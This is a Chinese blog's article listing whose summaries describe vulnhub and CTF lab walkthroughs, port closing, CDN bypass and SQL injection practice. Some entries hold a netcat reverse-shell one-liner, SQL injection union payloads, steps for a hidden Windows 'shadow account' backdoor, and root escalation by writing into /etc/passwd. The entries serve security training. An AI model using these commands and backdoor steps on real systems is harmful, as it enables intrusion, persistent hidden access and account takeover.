自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(42)
  • 收藏
  • 关注

原创 win双击运行jar文件

常规运行:java -jar xxx.jar。

2024-08-20 13:05:41 455

原创 JAVA环境配置&多环境(全,细,简单)

java环境配置&多个环境共存使用,简单详细

2023-03-07 09:43:37 2109

原创 Linux中host&host.conf&host.allow&host.deny作用

multi on 指定“/etc/hosts”文件中指定的主机是否可以有多个地址,拥有多个IP地址的主机一般称为多穴主机。该文件是由域名解析器(resolver,一个根据主机名解析IP地址的库)使用的配置文件,也是DNS域名解析的配置文件。order bind,hosts 指定主机名查询顺序,这里规定先采用dns解析器,解析不到才查hosts文件。限制所有去往此ip的服务 *:192.168.10.10 //编辑deny文件。或 off,指定主机名的欺骗是否打开 开启/关闭。telnet的ip段。

2023-02-02 15:15:53 2323

原创 Windows如何关闭端口(图文)

重启,上述网络端口就被关闭了,病毒和黑客再也不能连上这些端口。勾选对应列表、对应操作行为,(下图为选中状态)并应用,确定。方法1:创建防火墙策略进行阻止端口(防火墙开启才生效)控制面板--系统--管理工具--本地安全策略。去掉添加向导的勾选,添加筛选器列表。默认策略是不分配,点击分配激活。方法2:本地安全策略关闭。创建完毕,应用完成。

2023-02-01 11:27:20 8301

原创 linux如何关闭端口

前提:首先你必须知道,端口不是独立存在的,它是依附于进程的。某个进程开启,那么它对应的端口就开启了,进程关闭,则该端口也就关闭了。下次若某个进程再次开启,则相应的端口也再次开启。而不要纯粹的理解为关闭掉某个端口,不过可以禁用某个端口。

2023-02-01 10:28:13 10652

原创 windows操作系统后门--影子账户

passwd /add 在net user无法查看,但是本地用户和组可以查看。ceshi账户回来了,且权限跟admin一样,只能注册表删除账户。administrator账户,F值拷贝到ceshi账户F中。ceshi账户,将admin的F值拷贝到当前F值中。3.导出ceshi用户注册表文件。2.运行regedit注册表。5.再将导出的注册表导入。4.删除ceshi账户。

2023-01-31 16:50:38 620

原创 java多个环境配置&.bat配置文件

先创建.vbs文件,内容如下,只需要改对应bat文件名即可。测试版本:存在两个版本,想运行哪个环境输入对应语句即可。原理:vbs文件调用bat文件,bat再运行cmd命令。下次双击运行vbs文件即可直接运行jar包。二、创建bat运行程序:方便运行jar包。再创建.bat文件,内容如下。java环境改名:防止冲突。

2022-10-23 11:42:43 422

原创 vulnhub:THOTH TECH:1靶机

解密发现没有利用地方,发现位置是home下的,那就存在ssh用户,或者爆破ssh也可以。提示:用户名pwnlab,密码简单,建议修改。发现可以登录anonymous匿名访问。既然这样,可以爆破一波ftp登录密码。arp-scan -l扫描同网段主机。发现可以使用find有root权限。访问80端口,apache页面。是32位,是md5加密,解密去。尝试访问21端口,试试弱口令。查看当前用户的命令权限。nmap常规的扫描端口。hydra的登录爆破。

2022-10-22 14:52:07 1082

原创 chrome浏览器:您的连接不是私密连接,burp抓包

处理:简简单单,跟着我来没错,不要浪费时间再找了

2022-10-18 21:28:44 1677

原创 EVILBOX: ONE靶机

之前22端口的ssh服务,查看下此用户是否有密钥文件。思路:自己按照passwd存储格式生成一个高权限账户,并写入到passwd文件内,再切换用户。先猜测参数名是什么,index.html是存在的文件,--hw 0 隐藏返回的数据是0的。robots文件下是人名,记录下,试试ssh爆破,无效。有返回结果,说明接收的参数正确,尝试访问敏感文件。可以切换路径读取文件,说明存在文件包含漏洞。发现存在私钥,复制保存,爆破私钥的使用密码。生成密码,切换用户,拿到root权限。查看权限,分析文件权限,查看文件。

2022-10-15 15:07:14 1178

原创 vulnhub&Empire: LupinOne靶机

用 arsene 调用 /home/arsene/heist.py会产生一个shell权限-->拥有arsene权限-->切换到arsene用户。可以写入执行命令获取shell-->heiset.py引用-->库中命令就会被执行-->获取shell。john只会破解一次,记录再~/.john/john.pot文件中。~是家目录,尝试找到与此相似的路径,使用wfuzz工具对其路径进行测试。不需要密码可以使用arsene用户的权限去操作这两个文件。提示使用的破解字典了,john破解密码。

2022-10-11 22:21:13 837

原创 Vulnhub:BREAKOUT靶机

smb服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。可以配置操作系统内部,如用户,磁盘配额,服务或配置文件,以及修改和控制开源应用程序。每当看到二进制文件的副本时,都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户,与解密出的密码尝试登录webmin。再分析扫描出的信息,发现端口服务是smb。发现密码备份文件,但是没有任何的权限。

2022-10-10 18:33:48 583

原创 CDN如何绕过(详细)

知识点:0、CDN知识-工作原理及阻碍1、CDN配置-域名&区域&类型2、CDN绕过-靠谱十余种技战法3、CDN绑定-HOSTS绑定指向访问CDN 的全称是 Content Delivery Network,即内容分发网络CDN 是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。但在安全测试过程中,若目标存在 CDN 服务,将会影响到后续的安全测试过程。

2022-10-08 12:31:44 6919

原创 SQL注入漏洞测试(参数加密)&墨者靶场

爆表:-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1_mozhe。加密原理:明文-->AES加密--> bsse64加密--->base64加密-->密文。查回显:-1 union select 1,2,3,4_mozhe。尝试解密,无法解密,可能是有多种加密方式组合或加salt。

2022-10-06 11:31:26 260

原创 vulnhub:DC-9靶机

发现存在文件包含漏洞,使用端口敲门服务(知道它的自定义端口后,依次对其进行敲门,然后就可以开启ssh服务从而进行连接了。它的默认配置文件为:/etc/knockd.conf)知道它的这个配置文件的内容就可以得到它自定义的端口号,用LFI把这个文件爆出来。发现是个python脚本,既然拥有root权限,那我们就可以构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,再使用这个用户登录后,就可以获取到root权限。访问80端口,简单查看了一下网站,发现有搜索功能。访问22端口,被过滤掉了。

2022-10-05 11:00:24 372

原创 vulnhub:doubletrouble1靶机

根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码,尝试登录80端口http、22端口ssh。查看当前用户的sudo权限,发现可以sudo执行awk命令。是个管理员登录界面,使用burp弱口令爆破,无用。发现这个主题有个文件上传的命令执行漏洞,先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面,随手ssh爆破试试。尝试访问上面的目录,发现有个图片。发现有个ova镜像文件,下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。

2022-10-03 23:35:58 210

原创 vulnhub:DEATHNOTE:1靶机

kira用户可以使用sudo的任意命令,那直接切换用户好了:sudo su - 默认是切换root用户。login.php是登录页面,想着登录进去,弱口令字典+burp爆破下。得到密码kiraisevil,写入密码字典后,再用九头蛇爆破一遍。提示登录用户名在user.txt文件中,密码在网站中需要自己找。用户,字典都有了,使用wpscan开始爆破用户登录网页。发现notes.txt,点击,访问文件地址。根据收集的账户,密码进行爆破ssh用户。使用爆破的账户密码,登录成功。

2022-09-28 12:36:47 290

原创 vulnhub:jangow1.0.1靶机

试试https的443与http的80、一般服务器都不会限制这些端口,访问2.php并监听443。写入文件2.php,并用浏览器访问2.php,进行反弹用户的shell。反弹shell,nc -e参数不支持,bash -i也不支持。发现反弹不成功,试了很多反弹命令都不成功,可能是端口限制。成功反弹shell,查看系统的版本内核信息。尝试登录ftp,使用上面的两个账户密码。

2022-09-25 22:54:27 327

原创 渗透靶机扫描不到ip地址

原因一、没有开启nat模式原因二、虚拟网络编辑器错误原因三、靶机网卡配置错误。

2022-09-23 15:58:29 2040 3

原创 网络安全&&密码学

时间晚,公钥加密使用两个密钥,一个密钥用于加密信息,另一个密钥用于解密信息。公钥加密私钥解,私钥加密公钥解。非对称加密算法:缺点加密速度慢,明文紧密。对称加密算法缺点:密钥分发、密钥存储和管理。缺乏对数字签名的支持。缺点︰密钥分发、密钥存储和管理。数字签名过程:用自己私钥加密,对方用自己公钥解出来,完成数字签名。使用同一个密钥进行加密和解密、包括传统密码加密、私钥算法加密。对称加密算法对大文件进行加密,非对称加密算法对密钥加密。优势:加解密速度快,密文是紧凑的,安全。数字证书:类似身份证,证明是谁的公钥。

2022-09-22 21:22:35 906

原创 vulnhub:dirftingblues1靶机

bin/bash 的shell环境拷贝到getshell文件中,并赋予getshell文件suid权限。back.sh执行备份完成,生成了getshell文件,再执行getshell文件就获得root权限。翻译//伙计,我知道你是新来的但你应该知道怎么用主机文件到达我们的秘密地点。既然ip对应的dns被修改了,格式是主域名,扫描下子域名看看。可以知道这是本地的dns解析,修改/etc/host文件。简单的浏览 下,再去80端口看看,查看下网站源码。访问扫描出的目录文件,这些文件语言脚本都没啥用。

2022-09-22 12:26:44 82

原创 vulnhub:DC3靶机

cat /tmp/f|/bin/sh -i 2>&1|nc ip 端口>/tmp/f。蚂蚁剑不适合提权,协议冲突不能持久链接,需要反弹shell到kali,为后续提权做准备。密码写入到pass.txt,john破解(可以破解多种加密方式的工具)版本为3.7.0,使用漏洞库searchsploit查找一下漏洞情况。蚁剑链接,第一次错误,查了下才知道目录在什么位置。创建一句话木马,且显示了保存到的路径。查看系统版本信息,根据漏洞库查找一下。此用户不是root用户,需要提权。接着跑出表,列,数据。

2022-09-18 15:02:03 503

原创 vulnhub:DC8靶机

在目标机,在本地从kaili获取文件(scpy kaili的ip:文件名 本地目录)john用户登录成功,找到能执行php代码,写入反弹shell语句,进行反弹shell。权限低,没有其他sudo可利用的权限,find查看下有suid权限的文件命令。在说明里,有两个使用方法,将文件复制出来(建议复制到/tmp,不限权限)kali端监听,成功反弹shell,升级交互shell。上面已经写入,提交内容,来执行下写入的php语句。利用一下此shell脚本,这是个可以提权的脚本。破解密码是trutle。

2022-09-17 15:25:18 416

原创 vulnhub:DC7靶机

1,常规的扫描ip、端口、目录2、目录没利用点3、借助外界源码,链接用户4、用户没权限、有可利用的文件5、修改admin账户,拿webshell6、反弹shell,提权。

2022-09-15 16:49:05 282

原创 vulnhub:DC-6靶机

有个root权限执行的nmap,nmap--script 参数可以执行脚本,只需写入提权脚本到此文件,再执行。这个文件中写入/bin/bash命令,然后以jens用户身份运行就可以获取到jens的shell了。水平越权,ssh链接此用户,sudo -l查看可以使用其他shell执行的文件。这账号不是root权限,一般home有用户信息,找到文件中有一组账户密码。扫描wordpress中的存在的用户,并写入到user.txt文件中。页面登录成功,这账户没啥操作权限,发现wordpress的一个插件。

2022-09-14 13:57:13 281

原创 vulnhub:happycorp靶机

使用openssl生成newroot-666的密码加密,并写入到passwd。尝试admin弱口令登录,提升不存在用户名,可使用之前记录的用户名尝试。复制passwd传到kali,复制出来的文件在kali的挂载点里。想查看.ssh文件,发现需要权限,尝试添加1001的用户和组。挂载点的passwd原文件不可写入,需要复制出来进行写入。拿出私钥,利用私钥登录karl这个普通用户的管理。提示需要使用私钥的密码,使用john破解密码。再kali上远程挂载此文件,并查看内容。进入.ssh文件,查看到有flag。

2022-09-13 19:46:17 138

原创 vulnhub:EARTH靶机

在地球历史的最初10亿年里,海洋中出现了生命,并开始影响地球的大气和表面,导致厌氧生物的激增,后来又出现了好氧生物。从上面内容得到了一个信息,加密算法是xor,有个testdata.txt文件,用户名是terra。发现有个testingnotes文件,但是不知道是何种格式,自己尝试测试发现是txt文件格式。或者我们应该每周换一次钥匙?发现是禁止远程链接,发现需要对ip地址进行16进制的转化绕过。*需要改进的消息界面和管理面板的界面,它目前是非常基本的。*使用XOR加密作为算法,应该是安全的RSA使用。

2022-09-13 19:43:53 1063 3

原创 vulnhub:Durain靶机

每个端口都需进行探测,但8000是nginx代理,信息归属真实的80端口。Wordpress探测工具—wpscan:可以探测admin用户与信息,可用于登录。1.搜索kali同一网段的存在的ip地址:192.168.72.129。发现端口下的web目录,再基于端口进行尝试访问下面每个web目录。准备:部署好Durain靶机,并设置网络配置为nat模式。刷新,查看代码,即可获取到了 / 下的目录。尝试查看etc/passwd的用户信息文件。查看代码,看出访问日志用户。针对扫描出的端口分析。

2022-09-13 19:38:23 203

原创 vulnhub:DC5靶机

可以显示,说明文件包含漏洞可以利用,这是nginx系统,含有日志默认存在/var/log/nginx以.log结尾,fuzz爆破日志文件名。找到了两个文件,查看下内容,脚本默认路径:/usr/share/exploitdb/exploits/linux/local/可以访问,发现我们的操作都会被access.log日志记录,那么写入一句话木马也会被记录到日志里。将三段代码放进三个文件中,libhax.c/rootshell.c/run.sh。发现file参数可以使用,读取敏感文件/etc/passwd。

2022-09-13 10:14:02 342

原创 upload-labs通关-文件上传靶场-详细

upload-labs靶场详细教程

2022-09-12 20:19:22 882 1

原创 vulnhub:DC1靶机

执行完成,获得了meterpreter(Meterpreter是Metasploit框架中的一个扩展模块,是返回给我们的一个控制通道,用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接,功能强大:可以提权、打开shell、显示密码,显示主机信息、截屏、上传下载、隐藏、躲避系统的扫描等)根据第一个flag提示去寻找cms的cinfig file 并且Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看一下发现flag2。

2022-09-12 15:08:42 315

原创 vulnhub:DC4靶机

这个用户也不是root权限,那就sudo-l查看有哪些权限,发现有个命令不需要密码可以执行。jim用户查看到一个邮件的文件,去/var/mail目录查看还有没有其他邮件。那我们去抓包试试看,看到第一个命令传输的是ls+-h,再去看看其他两个包。查看下文件,home的用户,旧的password文件。发现有exim4命令,可以提权,查看版本号为4.89。查看一下用户权限和一些文件信息,还是没找到想要信息。知道了密码本,还有用户名。发现charles的登录密码,登录看看。访问,都需要登录,要不然就是错误页面。

2022-09-12 09:06:09 299

原创 vulnhub:DC2靶机

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。您仍然需要获得最终flag(唯一真正重要的flag!继续 - git outta here!Cewl 是以爬虫模式在指定URL上收集单词的工具,并将其制作成密码字典,以提高密码破解工具的成功率。rbash是受限的shell,它与一般标准shell的区别在于会限制执行一些行为。

2022-09-12 09:03:12 125

原创 vulnhub DC-1靶机

信息收集、信息利用、漏洞攻击、提权等

2022-09-12 08:55:29 15

原创 redhat yum换源

redhat使用yum源时不成功,这是因为使用 redhat 自带的 yum源要付费,所以需要自己重新生成 yum源,Redhat7 和Centos7是完全一样的,可是安装完Redhat7以后,使用yum安装软件,提示红帽操作系统未注册。2.下载rpm包3.安装rpm包4.配置yumcd /etc/yum.repos.dwget http://mirrors.163.com/.help/CentOS7-Base-163.repovim /CentOS7-Base-163.rep

2022-07-06 21:36:33 1456 1

原创 ensp的dhcp实验配置案例

学会dhcp的配置,一目了然。适合初学者。

2022-06-22 21:37:51 1097

原创 【ubuntu】创建ssh服务,利用xshell链接

1.需要先安装openssh-server服务2.配置sshd_config文件 3.重启ssh服务4.查看ssh服务状态5.这就可以用xshell链接了。完成

2022-06-13 17:06:18 222

原创 Ubuntu虚拟机无网卡,无IP地址,右上角没有网络链接图标

问题:访问不了网络,没有ipv4地址解决过程:1.检查网卡模式(我是NAT模式),重启,无作用2.虚拟网络编辑器,,还原默认设置,无作用3.尝试在主机上重新开启vm网卡,无作用4.命令行配置,右上角出现网路链接图标,有ipv4,可上网......

2022-06-13 16:17:22 1159

原创 虚拟机安装tools,重新安装tools按钮灰色(看完就会)

是不是不知道有没有安装tools?找不到tools文件?重新tools安装按钮是灰色?看完就会,简单。1.先删除tools文件2.执行第一步后,此处按钮就不再是灰色,就可再重新安装tools3.生成文件在本地,进入文件夹,并解压tar. gz文件4.在当前文件里打开终端,输入 ./ vmware-tools-distrib 5.所有的安装步骤默认即可6.重启,若可以 复制主机文件到虚拟机中 及安装成功......

2022-06-09 21:51:25 2757

原创 ubuntu添加root登录用户(小白操作,仅需简单4步)

添加 root登录用户,两分钟操作,代码都写好了,复制就可用

2022-06-09 20:56:09 4509

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除